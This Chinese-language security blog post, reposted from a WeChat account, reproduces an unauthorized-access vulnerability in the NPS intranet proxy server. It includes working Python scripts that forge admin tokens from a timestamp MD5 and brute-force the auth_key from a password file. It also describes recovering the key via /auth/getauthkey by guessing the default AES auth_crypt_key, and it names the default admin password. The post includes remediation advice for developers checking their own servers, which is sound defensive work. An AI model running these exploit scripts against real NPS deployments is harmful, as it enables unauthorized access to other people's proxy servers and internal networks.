NPS未授权访问漏洞详解

admin
admin
admin
137435
文章
113
评论
2024年10月7日20:45:23评论96 views字数 2628阅读8分45秒阅读模式

0x01简介       

NPS是一款轻量级、高性能、功能强大的内网渗透代理服务器,具有强大的Web管理终端。在红蓝队攻防战经常被用来进行内网穿透,流量代理。相比较frp、sockets等代理工具来说NPS有web界面可以更方便的对代理进行管理,深受网络安全人员的喜爱。
在2022年8月份左右,NPS爆出了当用户使用默认配置,未配置auth_key参数时攻击者可以利用时间戳直接伪造管理员token的漏洞。但这个漏洞修复还有些需要注意的地方,请往下看。
0x02复现
1.搭建NPS服务器,在/etc/nps/nps.conf的配置文件使用默认配置文件。注意这里auth_key被注释,auth_crypt_key为默认值。

NPS未授权访问漏洞详解

2.访问网站,这里还有个漏洞要注意,nps的默认账号为admin密码为123。所以请不要忘记更改密码。

NPS未授权访问漏洞详解

3.运行以下脚本就可以获得NPS里的代理信息,其中打印出来的链接可以直接粘贴到nps的url后面进入后台。
import timeimport  requestsimport hashlibnow = time.time()m = hashlib.md5()m.update(str(int(now)).encode("utf8"))auth_key = m.hexdigest()datas = {'search':"","order":"asc","offset":0,"limit":10,'auth_key': auth_key,'timestamp':int(now)}print("/index/index?auth_key={0}&timestamp={1}".format(auth_key,int(now)))headers = {                    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36"                }response=requests.post("http://192.168.221.130:8080/client/list",data=datas,headers=headers, allow_redirects=False)print(response.status_code)print(response.text)

NPS未授权访问漏洞详解

NPS未授权访问漏洞详解

0x03进阶

该漏洞修复方式是注释掉auth_crypt_key,并修改auth_key的值为随机值,但很多开发者并不会给auth_key设置为随机值,导致攻击者可以爆破该值拼接到时间戳上md5来触发此漏洞。

1.这里我将auth_crypt_key注释掉,修改auth_key的值为test,因为官方默认auth_key的值就是test,如果开发者只是删除了前方的注释,则值为test。

NPS未授权访问漏洞详解

2.但还有很多情况下开发者自己配置了auth_key所以我们修改脚本对auth_key的值进行爆破。如果秘钥正确,也可以利用该漏洞。

import timeimport  requestsimport hashlibwith open(r"E:toolspassword100.txt",encoding="utf8") as f:    for cs in f.readlines():        now = time.time()        m = hashlib.md5()        cs=cs.replace("n","").strip()        m.update(cs.encode()+str(int(now)).encode("utf8"))        auth_key = m.hexdigest()        datas = {'search':"","order":"asc","offset":0,"limit":10,'auth_key': auth_key,'timestamp':int(now)}        headers = {                    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36"                }        response=requests.post("http://192.168.221.130:8080/client/list",data=datas,headers=headers, allow_redirects=False)        print(cs)        print(response.status_code)        if(response.status_code==200):            print("/index/index?auth_key={0}&timestamp={1}".format(auth_key, int(now)))            print(response.text)            break

NPS未授权访问漏洞详解

还有种情况就是开发者同时设置了auth_crypt_key和auth_key,此时可以通过访问/auth/getauthkey接口获取到加密的auth_key但是需要猜到auth_crypt_key的值才能解出正确的auth_key。
所以同样的,这种情况下可以对auth_crypt_key的值进行爆破,但需要注意一般auth_crypt_key的值都是16位数,默认是1234567812345678。有正确的auth_crypt_key后就可以对访问/auth/getauthkey的接口获得的秘钥进行AES CBC PK7解密,之后的利用过程就和上面一样。

1.NPS如下配置。

NPS未授权访问漏洞详解

2.访问/auth/getauthkey接口获取加密的后的auth_key。

NPS未授权访问漏洞详解

3.对7831xxxx进行解密,秘钥和IV为你猜测的auth_crypt_key,AES解密,可以看到顺利解出了auth_key。如果你没解出来,大概率是你猜测的秘钥不对。

NPS未授权访问漏洞详解

4.和之前一样,将auth_key和时间戳拼接md5后既可利用该漏洞。

NPS未授权访问漏洞详解

NPS未授权访问漏洞详解

0x04结语

很多开发者按照互联网的教程,注释掉或者修改auth_crypt_key值就以为修复该漏洞了。但其实这些值如果是默认值或者弱口令攻击者很方便就可以爆破出你的auth_key,导致漏洞依然存在。

创作不易,转载请注明出处。该文章主要用来协助开发者排查漏洞,请勿用于非法用途。

原文始发于微信公众号(地表最强伍迪哥):NPS未授权访问漏洞详解

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年10月7日20:45:23
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   NPS未授权访问漏洞详解https://cn-sec.com/archives/2024933.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息